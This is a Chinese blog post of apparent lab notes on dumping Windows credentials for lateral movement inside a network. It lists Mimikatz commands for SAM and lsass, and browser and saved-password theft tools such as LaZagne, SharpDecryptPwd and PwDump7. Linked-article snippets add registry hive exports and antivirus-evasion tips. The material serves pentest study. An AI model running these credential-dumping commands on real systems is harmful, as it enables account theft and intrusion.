内网安全:各类密码的抓取

于 2024-07-21 21:28:13 发布
阅读量1.9k 收藏 25
点赞数 29
文章标签: 内网安全 抓密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80116443/article/details/140590875
版权

Mimikatz在线读取SAM文件

离线读取SAM文件

在线读取lsass进程

离线读取lsass进程

BrowserGhost浏览器密码抓取

Sharp-HackBrowserData浏览器密码抓取

SharpDecryptPwd数据库密码抓取

LaZagne各类密码的抓取

Windows其他类型抓NTLM Hash工具

sam文件和lsass进程就是Windows存储本地密码的文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向

Mimikatz在线读取SAM文件:

首先上传工具

命令框输入:

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

即可得到其他用户的NTLM Hash值和SID

离线读取SAM文件:

防止上传的工具被杀毒软件杀掉

1.先导出sam文件和system文件

2.将sam文件和system文件导出到本地

3.打开mimikatz读取SAM文件和system文件获取密码:

在线读取lsass进程:

上传工具mimikatz

命令:mimikatz sekurlsa::logonPasswords

得到用户的Hash 密码

离线读取lsass进程:

1.查看进程:

2.使用powershell导出进程:

然后将其导出到本地

mimikatz读取:

BrowserGhost浏览器抓取:只能抓谷歌

先上传工具,再抓取密码

命令:BrowserGhost.exe

因为靶机没有谷歌浏览器,所以不能抓到密码

Sharp-HackBrowserData浏览器抓取:

可以抓取微软,谷歌,Edge等等浏览器

先上传工具,再抓取密码

命令:Sharp-HackBrowserData.exe

SharpDecryptPwd数据库密码抓取:

 基本用法:

       SharpDecryptPwd.exe -NavicatCrypto
       SharpDecryptPwd.exe -TeamViewer
       SharpDecryptPwd.exe -FileZilla
       SharpDecryptPwd.exe -WinSCP
       SharpDecryptPwd.exe -Xmangager -p Session_Path (-s UserSid)
       SharpDecryptPwd.exe -Browser

命令:SharpDecryptPwd.exe -NavicatCrypto

靶机没有数据库,所有抓不到密码

LaZagne各类密码的抓取:

上传工具,执行命令

命令:laZagne.exe all

可以抓取到wifi密码等等

Windows其他类型抓NTLM Hash工具

1.pwdump7

在命令行环境中运行PwDump7程序,可以得到系统中所有账户的NTLMHash

命令:PwDump7.exe

2.QuarksPwDump:

下载QuarksPwDump.exe,在命令行环境中输人

命令:QuarksPwDump.exe --dump-hash-local 导出三个用户的NLMHash

3.wce:这款工具是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。这款工具也分为32位和64位两个不同的版本

命令 : wce.exe

闰土炖猹
关注
  • 29
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 798
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
深信服SASE服务:内网安全接入
05-05
深信服SASE服务:内网安全接入
凭据获取——windows单机凭据获取
最新发布
qq_55202378的博客
07-14 985
在windows中,SAM文件是windows用户的账户数据库,位于系统的目录中,所有本地用户的用户名、密码hash等信息都存储在这个文件中。用户输入密码登录时,用户输入的明文密码会被转化为hash,然后再与SAM文件中的hash值对比,若相同,则认证成功。lsass.exe是windows的一个系统进程,用于实现系统的安全机制,主要用于本地安全和登录策略。在通常情况下,用户输入密码登录后,登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中,用户的明文密码经过WDigest和。
域横向移动分析
qq_38675102的博客
12-31 878
windwos内网横移学习笔记
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 2734
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
AA8j的博客
07-26 499
拓扑图 Windows系统散列值获取与防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
使用mimikatz解析windows10系统盘(通常是 C 盘)的 Windows\System32\config 目录下SAM (Security Accounts Manager) 文件获取管理...
weixin_42598278的博客
01-12 376
使用 Mimikatz 工具可以解析 Windows 10 系统盘(通常是 C 盘)的 Windows\System32\config 目录下 SAM (Security Accounts Manager) 文件获取管理员密码。但是这是非法的行为, 不提倡使用。 ...
使用mimikatz抓取windows管理员密码
whoim_i的博客
12-20 9584
目录基于SAM文件密码破解Mimikatz是个啥?mimikatz基础命令抓取windows密码使用mimikatz读取域控上所有域用户的hash值 基于SAM文件密码破解 SAM文件即账号密码数据库文件。 当我们登录系统的时候,系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对,如发现此次密码SAM文件中的加密数据符合时,你就会顺利登录;如...
内网信息安全管理软件.doc
11-18
内网信息安全管理软件是针对企业内部网络环境设计的,旨在保障网络数据安全,防止非法入侵、信息泄露和内部滥用等问题。此类软件通常包含多个子系统,如可信网络监控、数据管理、网络认证和保密系统,以确保网络环境...
内网安全的六大弊病
10-23
随着企业信息化管理的普及,网络安全在企业中的作用...但是对于内网安全这部分内容,人们还没有具体的措施。对于安全方面的设计存在着种种弊病。文章在这里做了一些总结,希望对各位提高内网安全有一定的警示作用。
内网渗透测试安全学习ppt
02-12
9. **安全策略审查**:评估目标内网安全策略,包括密码策略、访问控制、日志管理等,找出可能的薄弱环节。 10. **报告与建议**:完成渗透测试后,需编写详细的报告,列出发现的问题、影响程度、以及修复建议。...
mimikatz抓取密码
G208_522的博客
10-26 4691
mimikatz抓取密码
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8665
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
mimikatz+ProcDump离线读取win2008及以下用户密码
q996966912的博客
09-01 720
win2008读取普通用户密码
sam文件获取与解密
热门推荐
Shanfenglan's blog
08-21 29万+
前言 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM #通过SAM数据库获得用户hash的方法 远程读取 mimikatz在线读取SAM数据库 privilege::debug token::elevate lsadump::sam powershell 利用empire里面的一个powershell
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1961
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值